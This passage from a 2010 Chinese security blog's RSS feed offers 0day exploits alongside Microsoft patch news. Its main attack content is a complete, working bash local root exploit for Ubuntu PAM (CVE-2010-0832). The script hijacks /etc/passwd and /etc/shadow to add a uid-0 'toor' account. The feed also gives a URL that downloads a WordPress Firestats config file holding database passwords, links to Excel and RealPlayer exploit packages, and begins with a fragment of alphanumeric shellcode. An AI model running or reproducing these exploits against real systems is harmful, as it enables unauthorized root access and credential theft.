AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC</pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1923/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Excel 0x5D 记录缓冲区溢出0day程序</title>
		<link>http://www.spookzang.net/article/1919</link>
		<comments>http://www.spookzang.net/article/1919#comments</comments>
		<pubDate>Thu, 15 Jul 2010 05:35:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[编程溢出]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[溢出]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1919</guid>
		<description><![CDATA[Excel 0x5D 记录缓冲区溢出漏洞，附带漏洞0day利用程序，漏洞影响的版本是Office 2007.
]]></description>
			<content:encoded><![CDATA[<p>Excel 0x5D 记录缓冲区溢出漏洞！受影响的版本是Office 2007.<br />
<a href='http://image.spookzang.net//2010/07/14361.zip'>点击下载利用程序</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1919/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>今天微软发布新补丁，请及时更新</title>
		<link>http://www.spookzang.net/article/1916</link>
		<comments>http://www.spookzang.net/article/1916#comments</comments>
		<pubDate>Wed, 14 Jul 2010 14:34:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[安全新闻]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[补丁]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1916</guid>
		<description><![CDATA[今天，微软发布了漏洞更新补丁，这次更新修复四个安全漏洞，包括Windows系统和Office在内的已知漏洞将在此次更新中修复。因这些漏洞已经有黑客开发出了0day程序，并且已经被大规模的使用，请网民及时升级.]]></description>
			<content:encoded><![CDATA[<p>   今天，微软发布了漏洞更新补丁，这次更新修复四个安全漏洞，包括Windows系统和Office在内的已知漏洞将在此次更新中修复。</p>
<p>   微软这次给漏洞补丁的编号是从ms10-042到ms10-045，其中，MS10-42、 MS10-43修复了黑客可以利用特殊构造的程序从而远程执行代码的漏洞，而MS10-44 、MS10-45则解决了OFFICE ACCESS 以及OUTLOOK中的远程代码执行漏洞。</p>
<p>    因这些漏洞已经有黑客开发出了0day程序，并且已经被大规模的使用，请网民及时升级.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1916/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ubuntu 本地提权0day</title>
		<link>http://www.spookzang.net/article/1914</link>
		<comments>http://www.spookzang.net/article/1914#comments</comments>
		<pubDate>Tue, 13 Jul 2010 03:35:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[*UNIX相关]]></category>
		<category><![CDATA[入侵渗透]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[unix]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1914</guid>
		<description><![CDATA[一个Ubantu的本地提权0day程序，其利用了pam-1.1.0一个漏洞，从而能添加一个用户名和密码为toor的root用户，但是这个漏洞利用程序只能用于pam-1.1.0的版本。]]></description>
			<content:encoded><![CDATA[<p>一个Ubantu的本地提权0day程序，其利用了pam-1.1.0一个漏洞，从而能添加一个用户名和密码为toor的root用户，但是这个漏洞利用程序只能用于pam-1.1.0的版本。</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
</pre></td><td class="code"><pre class="perl" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>
<span style="color: #666666; font-style: italic;">#</span>
<span style="color: #666666; font-style: italic;"># Exploit Title: Ubuntu PAM MOTD local root</span>
<span style="color: #666666; font-style: italic;"># Date: July 9, 2010</span>
<span style="color: #666666; font-style: italic;"># Author: Anonymous</span>
<span style="color: #666666; font-style: italic;"># Software Link: http://packages.ubuntu.com/</span>
<span style="color: #666666; font-style: italic;"># Version: pam-1.1.0</span>
<span style="color: #666666; font-style: italic;"># Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)</span>
<span style="color: #666666; font-style: italic;"># CVE: CVE-2010-0832</span>
<span style="color: #666666; font-style: italic;"># Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i</span>
<span style="color: #666666; font-style: italic;"># </span>
<span style="color: #666666; font-style: italic;">#</span>
<span style="color: #666666; font-style: italic;"># Local root by adding temporary user toor:toor with id 0 to /etc/passwd &amp; /etc/shadow.</span>
<span style="color: #666666; font-style: italic;"># Does not prompt for login by creating temporary SSH key and authorized_keys entry.</span>
<span style="color: #666666; font-style: italic;">#</span>
<span style="color: #666666; font-style: italic;">#   user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh</span>
<span style="color: #666666; font-style: italic;">#   [*] Ubuntu PAM MOTD local root</span>
<span style="color: #666666; font-style: italic;">#   [*] Backuped /home/user/.ssh/authorized_keys</span>
<span style="color: #666666; font-style: italic;">#   [*] SSH key set up</span>
<span style="color: #666666; font-style: italic;">#   [*] Backuped /home/user/.cache</span>
<span style="color: #666666; font-style: italic;">#   [*] spawn ssh</span>
<span style="color: #666666; font-style: italic;">#   [+] owned: /etc/passwd</span>
<span style="color: #666666; font-style: italic;">#   [*] spawn ssh</span>
<span style="color: #666666; font-style: italic;">#   [+] owned: /etc/shadow</span>
<span style="color: #666666; font-style: italic;">#   [*] Restored /home/user/.cache</span>
<span style="color: #666666; font-style: italic;">#   [*] Restored /home/user/.ssh/authorized_keys</span>
<span style="color: #666666; font-style: italic;">#   [*] SSH key removed</span>
<span style="color: #666666; font-style: italic;">#   [+] Success! Use password toor to get root</span>
<span style="color: #666666; font-style: italic;">#   Password:</span>
<span style="color: #666666; font-style: italic;">#   root@ubuntu:/home/user# id</span>
<span style="color: #666666; font-style: italic;">#   uid=0(root) gid=0(root) groupes=0(root)</span>
<span style="color: #666666; font-style: italic;">#</span>
P<span style="color: #339933;">=</span><span style="color: #ff0000;">'toor:x:0:0:root:/root:/bin/bash'</span>
S<span style="color: #339933;">=</span><span style="color: #ff0000;">'toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'</span>
echo <span style="color: #ff0000;">&quot;[*] Ubuntu PAM MOTD local root&quot;</span>
<span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>z <span style="color: #ff0000;">&quot;$(which ssh)&quot;</span> <span style="color: #009900;">&#93;</span> <span style="color: #339933;">&amp;&amp;</span> echo <span style="color: #ff0000;">&quot;[-] ssh is a requirement&quot;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000066;">exit</span> <span style="color: #cc66cc;">1</span>
<span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>z <span style="color: #ff0000;">&quot;$(which ssh-keygen)&quot;</span> <span style="color: #009900;">&#93;</span> <span style="color: #339933;">&amp;&amp;</span> echo <span style="color: #ff0000;">&quot;[-] ssh-keygen is a requirement&quot;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000066;">exit</span> <span style="color: #cc66cc;">1</span>
<span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>z <span style="color: #ff0000;">&quot;$(ps -u root |grep sshd)&quot;</span> <span style="color: #009900;">&#93;</span> <span style="color: #339933;">&amp;&amp;</span> echo <span style="color: #ff0000;">&quot;[-] a running sshd is a requirement&quot;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000066;">exit</span> <span style="color: #cc66cc;">1</span>
backup<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
    <span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>e <span style="color: #ff0000;">&quot;$1&quot;</span> <span style="color: #009900;">&#93;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>e <span style="color: #ff0000;">&quot;$1&quot;</span><span style="color: #339933;">.</span>bak <span style="color: #009900;">&#93;</span> <span style="color: #339933;">&amp;&amp;</span> rm <span style="color: #339933;">-</span>rf <span style="color: #ff0000;">&quot;$1&quot;</span><span style="color: #339933;">.</span>bak
    <span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>e <span style="color: #ff0000;">&quot;$1&quot;</span> <span style="color: #009900;">&#93;</span> <span style="color: #339933;">||</span> <span style="color: #000066;">return</span> <span style="color: #cc66cc;">0</span>
    mv <span style="color: #ff0000;">&quot;$1&quot;</span><span style="color: #009900;">&#123;</span><span style="color: #339933;">,.</span>bak<span style="color: #009900;">&#125;</span> <span style="color: #339933;">||</span> <span style="color: #000066;">return</span> <span style="color: #cc66cc;">1</span>
    echo <span style="color: #ff0000;">&quot;[*] Backuped $1&quot;</span>
<span style="color: #009900;">&#125;</span>
restore<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
    <span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>e <span style="color: #ff0000;">&quot;$1&quot;</span> <span style="color: #009900;">&#93;</span> <span style="color: #339933;">&amp;&amp;</span> rm <span style="color: #339933;">-</span>rf <span style="color: #ff0000;">&quot;$1&quot;</span>
    <span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>e <span style="color: #ff0000;">&quot;$1&quot;</span><span style="color: #339933;">.</span>bak <span style="color: #009900;">&#93;</span> <span style="color: #339933;">||</span> <span style="color: #000066;">return</span> <span style="color: #cc66cc;">0</span>
    mv <span style="color: #ff0000;">&quot;$1&quot;</span><span style="color: #009900;">&#123;</span><span style="color: #339933;">.</span>bak<span style="color: #339933;">,</span><span style="color: #009900;">&#125;</span> <span style="color: #339933;">||</span> <span style="color: #000066;">return</span> <span style="color: #cc66cc;">1</span>
    echo <span style="color: #ff0000;">&quot;[*] Restored $1&quot;</span>
<span style="color: #009900;">&#125;</span>
key_create<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
    backup <span style="color: #339933;">~/.</span>ssh<span style="color: #339933;">/</span>authorized_keys
    ssh<span style="color: #339933;">-</span>keygen <span style="color: #339933;">-</span><span style="color: #000066;">q</span> <span style="color: #339933;">-</span>t rsa <span style="color: #339933;">-</span>N <span style="color: #ff0000;">''</span> <span style="color: #339933;">-</span>C <span style="color: #ff0000;">'pam'</span> <span style="color: #339933;">-</span>f <span style="color: #ff0000;">&quot;$KEY&quot;</span> <span style="color: #339933;">||</span> <span style="color: #000066;">return</span> <span style="color: #cc66cc;">1</span>
    <span style="color: #009900;">&#91;</span> <span style="color: #339933;">!</span> <span style="color: #339933;">-</span>d <span style="color: #339933;">~/.</span>ssh <span style="color: #009900;">&#93;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000066;">mkdir</span> <span style="color: #339933;">~/.</span>ssh <span style="color: #339933;">||</span> <span style="color: #000066;">return</span> <span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
    mv <span style="color: #ff0000;">&quot;$KEY.pub&quot;</span> <span style="color: #339933;">~/.</span>ssh<span style="color: #339933;">/</span>authorized_keys <span style="color: #339933;">||</span> <span style="color: #000066;">return</span> <span style="color: #cc66cc;">1</span>
    echo <span style="color: #ff0000;">&quot;[*] SSH key set up&quot;</span>
<span style="color: #009900;">&#125;</span>
key_remove<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
    rm <span style="color: #339933;">-</span>f <span style="color: #ff0000;">&quot;$KEY&quot;</span>
    restore <span style="color: #339933;">~/.</span>ssh<span style="color: #339933;">/</span>authorized_keys
    echo <span style="color: #ff0000;">&quot;[*] SSH key removed&quot;</span>
<span style="color: #009900;">&#125;</span>
own<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
    <span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>e <span style="color: #339933;">~/.</span>cache <span style="color: #009900;">&#93;</span> <span style="color: #339933;">&amp;&amp;</span> rm <span style="color: #339933;">-</span>rf <span style="color: #339933;">~/.</span>cache
    ln <span style="color: #339933;">-</span><span style="color: #000066;">s</span> <span style="color: #ff0000;">&quot;$1&quot;</span> <span style="color: #339933;">~/.</span>cache <span style="color: #339933;">||</span> <span style="color: #000066;">return</span> <span style="color: #cc66cc;">1</span>
    echo <span style="color: #ff0000;">&quot;[*] spawn ssh&quot;</span>
    ssh <span style="color: #339933;">-</span>o <span style="color: #ff0000;">'NoHostAuthenticationForLocalhost yes'</span> <span style="color: #339933;">-</span>i <span style="color: #ff0000;">&quot;$KEY&quot;</span> localhost true
    <span style="color: #009900;">&#91;</span> <span style="color: #339933;">-</span>w <span style="color: #ff0000;">&quot;$1&quot;</span> <span style="color: #009900;">&#93;</span> <span style="color: #339933;">||</span> <span style="color: #009900;">&#123;</span> echo <span style="color: #ff0000;">&quot;[-] Own $1 failed&quot;</span><span style="color: #339933;">;</span> restore <span style="color: #339933;">~/.</span>cache<span style="color: #339933;">;</span> bye<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
    echo <span style="color: #ff0000;">&quot;[+] owned: $1&quot;</span>
<span style="color: #009900;">&#125;</span>
bye<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
    key_remove
    <span style="color: #000066;">exit</span> <span style="color: #cc66cc;">1</span>
<span style="color: #009900;">&#125;</span>
KEY<span style="color: #339933;">=</span><span style="color: #ff0000;">&quot;$(mktemp -u)&quot;</span>
key_create <span style="color: #339933;">||</span> <span style="color: #009900;">&#123;</span> echo <span style="color: #ff0000;">&quot;[-] Failed to setup SSH key&quot;</span><span style="color: #339933;">;</span> <span style="color: #000066;">exit</span> <span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
backup <span style="color: #339933;">~/.</span>cache <span style="color: #339933;">||</span> <span style="color: #009900;">&#123;</span> echo <span style="color: #ff0000;">&quot;[-] Failed to backup ~/.cache&quot;</span><span style="color: #339933;">;</span> bye<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
own <span style="color: #339933;">/</span>etc<span style="color: #339933;">/</span>passwd <span style="color: #339933;">&amp;&amp;</span> echo <span style="color: #ff0000;">&quot;$P&quot;</span> <span style="color: #339933;">&gt;&gt;</span> <span style="color: #339933;">/</span>etc<span style="color: #339933;">/</span>passwd
own <span style="color: #339933;">/</span>etc<span style="color: #339933;">/</span>shadow <span style="color: #339933;">&amp;&amp;</span> echo <span style="color: #ff0000;">&quot;$S&quot;</span> <span style="color: #339933;">&gt;&gt;</span> <span style="color: #339933;">/</span>etc<span style="color: #339933;">/</span>shadow
restore <span style="color: #339933;">~/.</span>cache <span style="color: #339933;">||</span> <span style="color: #009900;">&#123;</span> echo <span style="color: #ff0000;">&quot;[-] Failed to restore ~/.cache&quot;</span><span style="color: #339933;">;</span> bye<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
key_remove
echo <span style="color: #ff0000;">&quot;[+] Success! Use password toor to get root&quot;</span>
su <span style="color: #339933;">-</span>c <span style="color: #ff0000;">&quot;sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; <span style="color: #000099; font-weight: bold;">\</span>
  chgrp shadow /etc/shadow; nscd -i passwd &gt;/dev/null 2&gt;&amp;1; bash&quot;</span> toor</pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1914/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>微软将于13号发布Windows和Office多个补丁</title>
		<link>http://www.spookzang.net/article/1907</link>
		<comments>http://www.spookzang.net/article/1907#comments</comments>
		<pubDate>Sun, 11 Jul 2010 10:09:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[安全新闻]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[补丁]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1907</guid>
		<description><![CDATA[微软将于13号发布Windows和Office多个补丁，并停止对于Windows sp2和Windows XP的更新. 本次一共修复了5处漏洞，受影响的系统分别为Window XP、Windows 2003 和 Windows 7 x64，Office方面，涉及了Access 2003、2007，还修复了关于outlook 2002、2003和2007]]></description>
			<content:encoded><![CDATA[<p>    7月11号，微软安全部门公布消息称，关于Windows 2000和Xp sp2的补丁程序提供将于13号正式结束。</p>
<p>　　自7月14日起，微软&#8221;绝对&#8221;不会再次提供这两个操作系统的更新程序。微软建议使用这两款系统的用户尽快升级至Xp sp3或者更高级的程序。</p>
<p>　　尽管微软对于XP的立场十分明确，但对于Windows Vista x64的的信息却十分含糊。因为64位操作系统没有办法升级到Windows Sp3。微软称出于对用户服务支持的考虑，我们Windows XP x64已经研发至RTM版。而此次也微软也希望64位用户升级到windows x64 sp2.</p>
<p>    本次一共修复了5处漏洞，受影响的系统分别为Window XP、Windows 2003 和 Windows 7 x64。<br />
　 Office方面，涉及了Access 2003、2007，还修复了关于outlook 2002、2003和2007。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1907/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress Firestats插件存在远程下载漏洞</title>
		<link>http://www.spookzang.net/article/1903</link>
		<comments>http://www.spookzang.net/article/1903#comments</comments>
		<pubDate>Sat, 10 Jul 2010 12:43:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1903</guid>
		<description><![CDATA[Firefstats 是 WordPress 下一个功能强大的统计插件。使用 Firestats ，你可以很方便地了解博客访问者的情况，以及博客被访问的情况。而他却出现了配置文件可以任意下载的漏洞。此漏洞可以让黑客下载其配置文件，配置文件中包含了数据库IP、密码等敏感信息。目前官方尚未提供漏洞补丁，使其成为了一个0day.]]></description>
			<content:encoded><![CDATA[<p>Firefstats 是 WordPress 下一个功能强大的统计插件。使用 Firestats ，你可以很方便地了解博客访问者的情况，以及博客被访问的情况。</p>
<p>而他却出现了配置文件可以任意下载的漏洞。目前官方尚未提供漏洞补丁，使其成为了一个0day</p>
<p>访问：</p>
<p>http://site/wp-content/plugins/firestats/php/tools/get_config.php</p>
<p>即可下载到get_config.php，其中包含了你的数据库用户名，密码等信息。<br />
<a href="http://image.spookzang.net//2010/07/14308.png"><img src="http://image.spookzang.net//2010/07/14308.png" alt="" title="14308" width="925" height="947" class="alignnone size-full wp-image-1904" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1903/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Real Player 12.0.0.879 Windows Xp 0day</title>
		<link>http://www.spookzang.net/article/1898</link>
		<comments>http://www.spookzang.net/article/1898#comments</comments>
		<pubDate>Fri, 09 Jul 2010 06:57:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[入侵渗透]]></category>
		<category><![CDATA[编程溢出]]></category>
		<category><![CDATA[溢出]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1898</guid>
		<description><![CDATA[这个漏洞是利用了Windows Xp的RCE漏洞(Windows Xp 帮助漏洞)，从而使得安装过Real Player 的用户能在播放的时候，触发漏洞，从而执行黑客所想执行那个的程序。]]></description>
			<content:encoded><![CDATA[<p>这个漏洞是利用了Windows Xp的<a href="http://www.spookzang.net/article/1891">RCE漏洞</a>。从而使得安装过Real Player 的用户能在播放的时候，触发漏洞，从而执行黑客所想执行那个的程序。（如图）</p>
<p><a href="http://image.spookzang.net//2010/07/14275.png"><img src="http://image.spookzang.net//2010/07/14275.png" alt="" title="14275" width="1023" height="690" class="alignnone size-full wp-image-1899" /></a></p>
<p><a href='http://image.spookzang.net//2010/07/rp-0day.zip'>漏洞利用程序下载：rp-0day</a><br />
<strong>解压密码为:1</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1898/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
